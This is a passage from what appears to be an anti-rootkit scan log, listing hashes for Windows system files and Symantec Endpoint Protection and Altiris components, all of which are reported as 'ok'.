15:33:59.0553 0x04bc  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] C:\Windows\System32\drivers\PEAuth.sys
15:33:59.0553 0x04bc  C:\Windows\System32\drivers\PEAuth.sys - ok
15:33:59.0554 0x04bc  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] C:\Windows\System32\drivers\secdrv.sys
15:33:59.0554 0x04bc  C:\Windows\System32\drivers\secdrv.sys - ok
15:33:59.0556 0x04bc  [ C57922F997CCD3F946A7E37BB76B7634, F3326D9225B8556BF3A0B3EF7A5CE78DD70DF4CC110114FB7909ABA4E9DF19A0 ] C:\Windows\System32\ncsi.dll
15:33:59.0556 0x04bc  C:\Windows\System32\ncsi.dll - ok
15:33:59.0558 0x04bc  [ 895C9AB0A855547445C4181195230757, 89BDA385D8CCB75C3D7B1BDFA567AC441A931F4E499C0835FEE9D010343FABB6 ] C:\Windows\System32\sfc_os.dll
15:33:59.0558 0x04bc  C:\Windows\System32\sfc_os.dll - ok
15:33:59.0560 0x04bc  [ 2BBF3FDB70B8965DFA0258CBAB41ECCE, 4EFA41765E46E90C6CBDB0DC1E0CD375D7AB3307C477171EBAA6A16AC32E5211 ] C:\Windows\System32\ssdpapi.dll
15:33:59.0560 0x04bc  C:\Windows\System32\ssdpapi.dll - ok
15:33:59.0562 0x04bc  [ 35ED5CA876DA81CFD607A027D7A0F925, C5C584538FE5ED61C1E17F932F0BAEDD7CAAF75EEFABBD8CAC46986E65C42956 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
15:33:59.0562 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe - ok
15:33:59.0564 0x04bc  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] C:\Windows\System32\regsvc.dll
15:33:59.0564 0x04bc  C:\Windows\System32\regsvc.dll - ok
15:33:59.0566 0x04bc  [ E3C817F7FE44CC870ECDBCBC3EA36132, D769FAFA2B3232DE9FA7153212BA287F68E745257F1C00FAFB511E7A02DE7ADF ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\msvcp100.dll
15:33:59.0566 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\msvcp100.dll - ok
15:33:59.0568 0x04bc  [ BF38660A9125935658CFA3E53FDC7D65, 60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\msvcr100.dll
15:33:59.0568 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\msvcr100.dll - ok
15:33:59.0570 0x04bc  [ EDC5AF5C846DF3F913245DF5767AF6F2, 67338F72902DE7591395EEAE75964EDC8E2C4AD96AD7FD8432F0B01B99E1CF7E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccL120U.dll
15:33:59.0570 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccL120U.dll - ok
15:33:59.0572 0x04bc  [ A543AC1F7138376D778D630A35FCBC4C, 2D824C66A97FC8C39DAFA397CC47495B712D175EEF393486946DA8936BDD466A ] C:\Windows\SysWOW64\psapi.dll
15:33:59.0572 0x04bc  C:\Windows\SysWOW64\psapi.dll - ok
15:33:59.0574 0x04bc  [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] C:\Windows\System32\drivers\srvnet.sys
15:33:59.0574 0x04bc  C:\Windows\System32\drivers\srvnet.sys - ok
15:33:59.0576 0x04bc  [ 1A948335669B18984BA356F7C0CD3C3B, A675EF78E81A238B49DF1029F0F964D1708F80A80F96A43FE774D0918117B7FA ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccVrTrst.dll
15:33:59.0576 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccVrTrst.dll - ok
15:33:59.0578 0x04bc  [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] C:\Windows\System32\drivers\tcpipreg.sys
15:33:59.0578 0x04bc  C:\Windows\System32\drivers\tcpipreg.sys - ok
15:33:59.0580 0x04bc  [ 210FCACAF902B2CD47CF9FD17D846146, 3F77AC721E084864C5966FF5337A90185F62203DC19C685328675500D629CB87 ] C:\Windows\System32\aeevts.dll
15:33:59.0580 0x04bc  C:\Windows\System32\aeevts.dll - ok
15:33:59.0581 0x04bc  [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] C:\Windows\System32\wiaservc.dll
15:33:59.0582 0x04bc  C:\Windows\System32\wiaservc.dll - ok
15:33:59.0583 0x04bc  [ 136760C1E9697BAF4ECDEAE5590A0806, 12E80D0923D794F4C520FEA7CB98EF581231B996FB1876EB20995E6E457EFF56 ] C:\Windows\System32\wbem\WMIsvc.dll
15:33:59.0583 0x04bc  C:\Windows\System32\wbem\WMIsvc.dll - ok
15:33:59.0585 0x04bc  [ 25E0900D1B452EDEB09B1F9B71195153, 96F47A96AA3510EBC67579806A679D82CF85709A1E041D026378E8F6DC0EB374 ] C:\Windows\System32\sysmain.dll
15:33:59.0585 0x04bc  C:\Windows\System32\sysmain.dll - ok
15:33:59.0587 0x04bc  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] C:\Windows\System32\trkwks.dll
15:33:59.0587 0x04bc  C:\Windows\System32\trkwks.dll - ok
15:33:59.0589 0x04bc  [ B73CAEC940B33914577C65C2C456F20B, 443420DDDFAC637C7341CD67EFA6A8BD7F0DA54685434BC6FCC6FCB1ECFCCB5F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvc.dll
15:33:59.0589 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvc.dll - ok
15:33:59.0591 0x04bc  [ 79721F4ED3C3B61D5DEBCE2A4EF831B9, D6963A67F0644B5E90D441879A0B7897A1B71FA1FC153AC506C85ECFDE22C872 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\EFACli.dll
15:33:59.0591 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\EFACli.dll - ok
15:33:59.0593 0x04bc  [ 6D1173EDC0D5C02ACE4BEA18F48E0746, BCDF818C079B3E90577AEEE7ECDA4DA2E54F0F393F5FFD26FD0D4793CE14038F ] C:\Windows\System32\drivers\srv2.sys
15:33:59.0593 0x04bc  C:\Windows\System32\drivers\srv2.sys - ok
15:33:59.0595 0x04bc  [ 0364256B4A2A93A8C8CDA6B3B5A0EFF5, BDA403E6CACC249C467671FB1FAF7B77FB019326BC18F9F6CF377104520E2654 ] C:\Windows\System32\wiatrace.dll
15:33:59.0595 0x04bc  C:\Windows\System32\wiatrace.dll - ok
15:33:59.0597 0x04bc  [ 5AA945234E9D4CCE4F715276B9AA712C, 65165BD131056816F009D987FC78AC86FFE0C3C38A27E73F873586B7FF4D59CF ] C:\Windows\System32\imageres.dll
15:33:59.0597 0x04bc  C:\Windows\System32\imageres.dll - ok
15:33:59.0599 0x04bc  [ 4E9C2DB10F7E6AE91BF761139D4B745B, 8F63F78294F5585D599A114AF449DCC447CCB239D0F0B490BFE6B34A2146E730 ] C:\Windows\System32\shacct.dll
15:33:59.0599 0x04bc  C:\Windows\System32\shacct.dll - ok
15:33:59.0601 0x04bc  [ EE3595E4A18D580237A372285CFDFA51, 28BEBDABC3699D140017D6FBA1C17E702127A4ADA6C1CCB425D53DC8718C977A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\srtsp32.dll
15:33:59.0601 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\srtsp32.dll - ok
15:33:59.0603 0x04bc  [ 68B4B128C6C41EF79157FFA11B1B9173, 75BA777C1371E695880B8C565B721477CE2F70016245B4DCC498CF6BD53FB1AB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccIPC.dll
15:33:59.0603 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccIPC.dll - ok
15:33:59.0605 0x04bc  [ 5997D769CDB108390DCFAEBF442BF816, 0E25CA984C0EEB629184423FAA9BC6D4356DF9A93F281E06DC83B4AC638AEC4A ] C:\Windows\SysWOW64\RpcRtRemote.dll
15:33:59.0605 0x04bc  C:\Windows\SysWOW64\RpcRtRemote.dll - ok
15:33:59.0607 0x04bc  [ 0E6F3F25B462FBDDC35313FBC7A07570, 410DEC5B279A106EF33F44E46608F09842F11E3701AE4CAF5E1C5106150E974F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\sms.dll
15:33:59.0607 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\sms.dll - ok
15:33:59.0609 0x04bc  [ B094390B6B2D0456821384771020870B, 137FEDD0EFBF1CEDA4930D8CE0A012A250CFF4020931846646090BB2C99EE7CE ] C:\Windows\SysWOW64\secur32.dll
15:33:59.0609 0x04bc  C:\Windows\SysWOW64\secur32.dll - ok
15:33:59.0610 0x04bc  [ 81077D44E9444860C0F353980DE05C81, 4A7C2A9106E27CE81CFCCCFE3E06854B3E298C7E3D5F1D7020A83564AF1F9241 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSet.dll
15:33:59.0611 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSet.dll - ok
15:33:59.0613 0x04bc  [ E3733F68BE3B0C5FAA7875A705200DB2, CBDC6B418F9B5C99CA1F0D7BB99E18E3AF62495FABDDE9B5DD8567DD5A34F998 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\sis.dll
15:33:59.0613 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\sis.dll - ok
15:33:59.0615 0x04bc  [ 20735E269DF367C76EF02DDE9C3FA477, 0D794D191A74406CCD62DCC270F9350981EE935488C61ADF168E98A712EE42B6 ] C:\Windows\System32\drivers\srv.sys
15:33:59.0615 0x04bc  C:\Windows\System32\drivers\srv.sys - ok
15:33:59.0616 0x04bc  [ A5ACADEE1EC8F9105CBD683A4D722CFE, 93DBE3E1F589A892644BFEE583404660C52BDDE77A6A0F154180A3548218DEE5 ] C:\Windows\System32\wbemcomn2.dll
15:33:59.0616 0x04bc  C:\Windows\System32\wbemcomn2.dll - ok
15:33:59.0618 0x04bc  [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] C:\Windows\System32\browser.dll
15:33:59.0618 0x04bc  C:\Windows\System32\browser.dll - ok
15:33:59.0620 0x04bc  [ CFEFA40DDE34659BE5211966EAD86437, AC0A3AD8AA47012C40785013E2273FC571F416BC9C9FFDA418FE72B3123C1FB0 ] C:\Windows\System32\netmsg.dll
15:33:59.0620 0x04bc  C:\Windows\System32\netmsg.dll - ok
15:33:59.0622 0x04bc  [ 5CE3ADEF1C7203DCC0467E084ACE5643, E8A26479F296451310D42215E3E280C80A18BD6E537A854D1702873AC4162382 ] C:\Windows\System32\srvsvc.dll
15:33:59.0622 0x04bc  C:\Windows\System32\srvsvc.dll - ok
15:33:59.0623 0x04bc  [ 636681CA4ECC169E763A611991E7A0C7, C03B6AE93FFF951628982EB73E6FEED872E1A270AD66158E2F193604DB3DCB9B ] C:\Windows\System32\wbem\WmiDcPrv.dll
15:33:59.0623 0x04bc  C:\Windows\System32\wbem\WmiDcPrv.dll - ok
15:33:59.0625 0x04bc  [ FF80CAD87555E8E4D2CFD7B9058343F8, 07653773FBEC1996408B8507B08E0E1E812830063F932F897F4B39EE63DDCDC4 ] C:\Windows\System32\sscore.dll
15:33:59.0625 0x04bc  C:\Windows\System32\sscore.dll - ok
15:33:59.0627 0x04bc  [ 81749E073AC5857B044A686B406E5244, 3884EE705CA34235B29942FEDA8FEA654A21139B8C2A1D5E009C7D07D6E6ADF1 ] C:\Windows\System32\clusapi.dll
15:33:59.0627 0x04bc  C:\Windows\System32\clusapi.dll - ok
15:33:59.0628 0x04bc  [ 344FCC9850C3A8A3B4D3C65151AF8E4C, C38853454E153B1AB4AEAE1AAFB7CB4B2E6234208CF24C09F3B2AFE25E271C5C ] C:\Windows\System32\resutils.dll
15:33:59.0629 0x04bc  C:\Windows\System32\resutils.dll - ok
15:33:59.0630 0x04bc  [ FCEABD99844A035DB8D96E6E8BCCBA5E, 6BC5366E6355FBBD69A5FD969BD4F5DBB87CD661EEC53B03C156DA885A477CB8 ] C:\Windows\System32\wbem\fastprox.dll
15:33:59.0630 0x04bc  C:\Windows\System32\wbem\fastprox.dll - ok
15:33:59.0632 0x04bc  [ 4D485945E7589FC64E4D6E59ECD483B7, C6497497F13C62D2DD90042DC88914F369289FD5EDED29ADD120A2F083BC354E ] C:\Windows\System32\wbem\wbemprox.dll
15:33:59.0632 0x04bc  C:\Windows\System32\wbem\wbemprox.dll - ok
15:33:59.0634 0x04bc  [ FF5688D309347F2720911D8796912834, 3B0D73C50D40A6F42629B7750F99F656BF5C1C50237D5F98B6C0F2CE5E2DA359 ] C:\Windows\SysWOW64\clbcatq.dll
15:33:59.0634 0x04bc  C:\Windows\SysWOW64\clbcatq.dll - ok
15:33:59.0636 0x04bc  [ 997714A70C11ED43A771AE5A95F0D026, A31E11FA571263890F4AF157FEE02C506D08E5066EE1F2B95456ED161AAA8EBD ] C:\Windows\System32\wbem\WinMgmtR.dll
15:33:59.0636 0x04bc  C:\Windows\System32\wbem\WinMgmtR.dll - ok
15:33:59.0638 0x04bc  [ 8B8D1CEF498678CAB9DF17145D34BC64, B833545CC592BBF77F4F3E6BA9961D10673AA3F4E2CF6369F6A3BDAF1BC02026 ] C:\Windows\SysWOW64\msxml3.dll
15:33:59.0638 0x04bc  C:\Windows\SysWOW64\msxml3.dll - ok
15:33:59.0640 0x04bc  [ AB28F96CB72CF5D4DF084A122F29102A, A2EC7380C8AA0402FB0AD1046B3A6C64D99EE05A83C49FCF3AFD446FAFCFEA2B ] C:\Windows\SysWOW64\urlmon.dll
15:33:59.0640 0x04bc  C:\Windows\SysWOW64\urlmon.dll - ok
15:33:59.0642 0x04bc  [ 1C60E09CA1C3A045BC4D367F67C915B7, DF1ED88CB57DA1AB1A4245AE0D5B42AFA3396EBF67B99411FFFB0DD06DE1AEAF ] C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll
15:33:59.0642 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll - ok
15:33:59.0644 0x04bc  [ 007863E45F25AA47A4C30D0930BBFD85, 60F2ABA40D520FCA2C57FA2DB72E111C14F21821DA17F662837506B80C269634 ] C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
15:33:59.0644 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll - ok
15:33:59.0646 0x04bc  [ 7321F18D1F820612ED0E9F2D4B578A7E, 612BD7DE1DFBD100BD6ACB37A38565D88C39842D990D296B9B8E1FB75C3A94E7 ] C:\Windows\SysWOW64\cryptsp.dll
15:33:59.0646 0x04bc  C:\Windows\SysWOW64\cryptsp.dll - ok
15:33:59.0648 0x04bc  [ 3516367FA7FC8BE393A77A079E93BB26, BFA0EBBE8EA0D6B886DD1B37394CD54F50A2B7B149D42BAA499ABEC47F6E815C ] C:\Program Files\Altiris\Dagent\dagent.exe
15:33:59.0648 0x04bc  C:\Program Files\Altiris\Dagent\dagent.exe - ok
15:33:59.0649 0x04bc  [ 0C212FA537F003B8F8C90A85D0F8DF27, 01995129F0985C439B3EAA59ECC5BD451ED65166284BFC0636B3F76E269998C3 ] C:\Windows\System32\wbem\wbemcore.dll
15:33:59.0649 0x04bc  C:\Windows\System32\wbem\wbemcore.dll - ok
15:33:59.0651 0x04bc  [ A67E03E39172459935C591F6E0534569, 96016B5E6101EE61BF3D6DBC0453942EF0CBAB7E5FC3C63E6BCA7B5D7251F66F ] C:\Windows\System32\wbem\esscli.dll
15:33:59.0651 0x04bc  C:\Windows\System32\wbem\esscli.dll - ok
15:33:59.0653 0x04bc  [ BA5CA827B50D8FE46478BA867B08D020, 7189389FE97FDF0EE442F0A36A79119EAB848659473D61E7A36205E053C37FFD ] C:\Windows\System32\wbem\wbemsvc.dll
15:33:59.0653 0x04bc  C:\Windows\System32\wbem\wbemsvc.dll - ok
15:33:59.0655 0x04bc  [ F37BCA66EA95079C806D80B23E041876, 46849672EF9C5DE70A0DF9FE7FA7EA8AC0466525DF02951B51386CE073E97C30 ] C:\Windows\System32\wbem\wmiutils.dll
15:33:59.0655 0x04bc  C:\Windows\System32\wbem\wmiutils.dll - ok
15:33:59.0657 0x04bc  [ 56C9C92B854E6AB6ECDA5C531B6ACF5A, FA8D18A8E2D6550E86E8F06987D2142C0ADD1F93808D06CB9292B82D850A75A1 ] C:\Windows\System32\wbem\repdrvfs.dll
15:33:59.0657 0x04bc  C:\Windows\System32\wbem\repdrvfs.dll - ok
15:33:59.0659 0x04bc  [ ED8EC63F7522DF4852147C84EC62C36A, 75633011CD28DCBD4834211A9D415F17DE15BFCD80FB9FF6CE25CBBD4E9899AF ] C:\Windows\SysWOW64\rsaenh.dll
15:33:59.0659 0x04bc  C:\Windows\SysWOW64\rsaenh.dll - ok
15:33:59.0661 0x04bc  [ 2BFF31508A58EA3F82CA8D6620AE6E13, B9E119F579902556A49F770731D069E0B79B56AFDCE471BC5995D71B9BD58CEF ] C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL
15:33:59.0661 0x04bc  C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL - ok
15:33:59.0663 0x04bc  [ 497DA0AF8FB33496ED1B0E5614EF23EA, EA0FE8B92788B83B011AA83D6B936C58E05A9A260DA0232A15936D0730B9AAC4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccGEvt.dll
15:33:59.0663 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccGEvt.dll - ok
15:33:59.0665 0x04bc  [ B0DF6B35B512D97C3D2889C36CF2FC8E, A5D845F5A5D0C0035EEEBCE8BA3E98F67C9BD34476499ED677B3F31E5FAF4763 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccGLog.dll
15:33:59.0665 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccGLog.dll - ok
15:33:59.0667 0x04bc  [ 5F39DD43C5650AFEC93C338CDCB55881, B563C5232E0DDCB526E1C5F0C5442D95D1A256B6A0F0EA1A5074DFB18FCF86E0 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccJobMgr.dll
15:33:59.0667 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccJobMgr.dll - ok
15:33:59.0669 0x04bc  [ 418E881201583A3039D81F43E39E6C78, C96AAC161E09BE12815A4E931E65F66DB1A456C03253EF1111AE66F44B1515FF ] C:\Windows\SysWOW64\winsta.dll
15:33:59.0669 0x04bc  C:\Windows\SysWOW64\winsta.dll - ok
15:33:59.0671 0x04bc  [ B9817A94C92A1AAE3FF36ACC0F615FC7, A93B9EBBD467DDC372B6AF8AB798F4E3536D34B999F99FE8C3D6B6B8BB35B738 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSubEng.dll
15:33:59.0671 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSubEng.dll - ok
15:33:59.0673 0x04bc  [ 0F8FAF67FC7C7C44BFCACBBDAB4351A4, 337A3DDCD2CED446232B93B04C9CF69CA81A912EC7AEF68C93C50A588082DFEC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccEmlPxy.dll
15:33:59.0673 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccEmlPxy.dll - ok
15:33:59.0675 0x04bc  [ BF5D1050B4DBFBFD196D355D55332100, A12B690934D625E437922FCE245041EBB01D776545A77F6230ADC7EC085FBFAA ] C:\Program Files\Altiris\Dagent\default.dll
15:33:59.0675 0x04bc  C:\Program Files\Altiris\Dagent\default.dll - ok
15:33:59.0677 0x04bc  [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] C:\Windows\System32\iphlpsvc.dll
15:33:59.0677 0x04bc  C:\Windows\System32\iphlpsvc.dll - ok
15:33:59.0679 0x04bc  [ 27B9E163740A226B65E4B9E186117911, 17411C6A6C1E699BC4B0C04D782FD9AA09CF577DBA41E743F7588904D489CB9F ] C:\Windows\System32\sqmapi.dll
15:33:59.0679 0x04bc  C:\Windows\System32\sqmapi.dll - ok
15:33:59.0681 0x04bc  [ 7B38D7916A7CD058C16A0A6CA5077901, 3F6DD990E2DA5D3BD6D65A72CBFB0FE79EB30B118A8AD71B6C9BB5581A622DCE ] C:\Windows\System32\wdscore.dll
15:33:59.0681 0x04bc  C:\Windows\System32\wdscore.dll - ok
15:33:59.0683 0x04bc  [ 6CEF7856A3EFAC59470F6208F0F585CE, 0F7A80DB821FDE6580E9481B6DA44844F717DDB4983B0E3D562BE43726153951 ] C:\Windows\System32\mpr.dll
15:33:59.0683 0x04bc  C:\Windows\System32\mpr.dll - ok
15:33:59.0685 0x04bc  [ 9661A8D6DC16A5D9ECD05CB992201EDC, BE26B380936BFEE513085B66D5DEFE2D1F9D991DB4903B50D382A1D350C12705 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Iron.dll
15:33:59.0685 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Iron.dll - ok
15:33:59.0686 0x04bc  [ CA9F7888B524D8100B977C81F44C3234, 57F3353F89724147D8AC8B69B12C1303DF26978309776F5F8CCF074526A915D3 ] C:\Windows\SysWOW64\winhttp.dll
15:33:59.0686 0x04bc  C:\Windows\SysWOW64\winhttp.dll - ok
15:33:59.0688 0x04bc  [ FB19FC5951A88F3C523E35C2C98D23C0, FF0DB8BF0C68DA0D09272E8181D2B5409C8850BB2F31AEA3AC4CD14C5A420A59 ] C:\Windows\SysWOW64\webio.dll
15:33:59.0688 0x04bc  C:\Windows\SysWOW64\webio.dll - ok
15:33:59.0690 0x04bc  [ 08DFDBD2FD4EA951DC46B1C7661ED35A, D926530C659DDAF80770663F46F1EFD94FFB4AAB475C4E3367CB531AF4A734E1 ] C:\Windows\SysWOW64\powrprof.dll
15:33:59.0690 0x04bc  C:\Windows\SysWOW64\powrprof.dll - ok
15:33:59.0692 0x04bc  [ 03706015DB44368375AEBE6339490E66, 02EB28B5156E320C1EBABC03D37E94EB770A721B99E1DD276F8DC2A50D76C381 ] C:\Windows\System32\netcfgx.dll
15:33:59.0692 0x04bc  C:\Windows\System32\netcfgx.dll - ok
15:33:59.0694 0x04bc  [ E4F85120668017775773AE87361BCFB2, A429CB6B0228EBE4A0BF93A1E3E59996FECCFE73C28DC0D90A32A1A6332C06EA ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuSvc.dll
15:33:59.0694 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuSvc.dll - ok
15:33:59.0696 0x04bc  [ 3B367397320C26DBA890B260F80D1B1B, 50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147 ] C:\Windows\System32\hnetcfg.dll
15:33:59.0696 0x04bc  C:\Windows\System32\hnetcfg.dll - ok
15:33:59.0698 0x04bc  [ FEB91B4DA0D540865260A33838654FA3, 8636B008BA329D3E6CC235D08BA4C914EFF45DBFCB9297C893CCDA8D907BA946 ] C:\Windows\System32\nci.dll
15:33:59.0698 0x04bc  C:\Windows\System32\nci.dll - ok
15:33:59.0699 0x04bc  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] C:\Windows\System32\netprofm.dll
15:33:59.0699 0x04bc  C:\Windows\System32\netprofm.dll - ok
15:33:59.0701 0x04bc  [ EDD25B8C70ACCE113965158A7882A29E, 25DB52216909BAF91C4A574ABBEC40483B5456C8160E8119CEE39BC1D209050C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymRedir.dll
15:33:59.0701 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymRedir.dll - ok
15:33:59.0703 0x04bc  [ A9BB350F8B12B496F15A83122531D783, AD39490252092D525DD7453B89D210CC8E7DC64BA4B3D25161A8E30D0C5EB455 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SNDSvc.dll
15:33:59.0703 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SNDSvc.dll - ok
15:33:59.0705 0x04bc  [ 6C399566C1E3E7D475C3698297221A20, 6BF2C1B0F8BE5712398BCFE88D3355C9B5E102FD22B239BD9DA1530B9CC7B386 ] C:\Windows\System32\wbem\WmiPrvSD.dll
15:33:59.0705 0x04bc  C:\Windows\System32\wbem\WmiPrvSD.dll - ok
15:33:59.0707 0x04bc  [ 0281DDC918760773F676CE924B153AAF, 8EC80BD5A9F0B926F3DD241C65CED1A2F0BABF7830AB4F91B5F9B2312E188BA8 ] C:\Windows\System32\ncobjapi.dll
15:33:59.0707 0x04bc  C:\Windows\System32\ncobjapi.dll - ok
15:33:59.0709 0x04bc  [ 5935C3E7DCDA36AA0E4D9284C8AC319B, A5010D53EC7A200835134FD3F22548DC0719A11483400991334DEE7666D4DAFB ] C:\Windows\System32\wbem\wbemess.dll
15:33:59.0709 0x04bc  C:\Windows\System32\wbem\wbemess.dll - ok
15:33:59.0710 0x04bc  [ 839F96DBAAFD3353E0B248A5E0BD2A51, 11DA5AD3EA5FF4766C12B99FB520B3CBE08581ECAF1A2FD1DC5AC835CA78FAC2 ] C:\Windows\SysWOW64\rasapi32.dll
15:33:59.0710 0x04bc  C:\Windows\SysWOW64\rasapi32.dll - ok
15:33:59.0712 0x04bc  [ FFA7172354B9256DBB2CDD75F16F33FE, 85B2F014C67C2E52540F17D561793C6633C9E98F12639CCD3854EB1EC34DD035 ] C:\Windows\SysWOW64\rasman.dll
15:33:59.0712 0x04bc  C:\Windows\SysWOW64\rasman.dll - ok
15:33:59.0714 0x04bc  [ 46E324B1ECB6FADBFA7C918EA4B0317D, B61C061DEEF98629E580453823CAB0315BC5329227816CF3D20F56985EE4437D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymRdrSv.dll
15:33:59.0714 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymRdrSv.dll - ok
15:33:59.0716 0x04bc  [ 07239335C86EC14DD1B86EDA4D32CEFC, C296F615FDD9E490DFA59FF583B358EE86DBAEE48FBEBE1D42D223FCB3D7BBCB ] C:\Windows\SysWOW64\dhcpcsvc6.dll
15:33:59.0716 0x04bc  C:\Windows\SysWOW64\dhcpcsvc6.dll - ok
15:33:59.0718 0x04bc  [ 9A85ABCE0FDD1AF8E79E731EB0B679F3, 2A610BEB16610FE2F2E9A50477A62A05481E8A5843A814955A0EDFF45D0304B3 ] C:\Windows\SysWOW64\dhcpcsvc.dll
15:33:59.0718 0x04bc  C:\Windows\SysWOW64\dhcpcsvc.dll - ok
15:33:59.0720 0x04bc  [ 0915C4DB6DBC3BB9E11B7ECBBE4B7159, ACE7F85685EB92FC3AB4215122B0469E32F23B196C49F08CDA7791D3122C45DC ] C:\Windows\SysWOW64\rtutils.dll
15:33:59.0720 0x04bc  C:\Windows\SysWOW64\rtutils.dll - ok


15:33:59.0722 0x04bc  [ 08BA8CFC9D1DD09BDC61E539526BD7D6, 4BB67B8833D482D88C5A1E502A4DD40C404C84F97B4F964EDFD6DEA00BFB11DD ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
15:33:59.0722 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe - ok
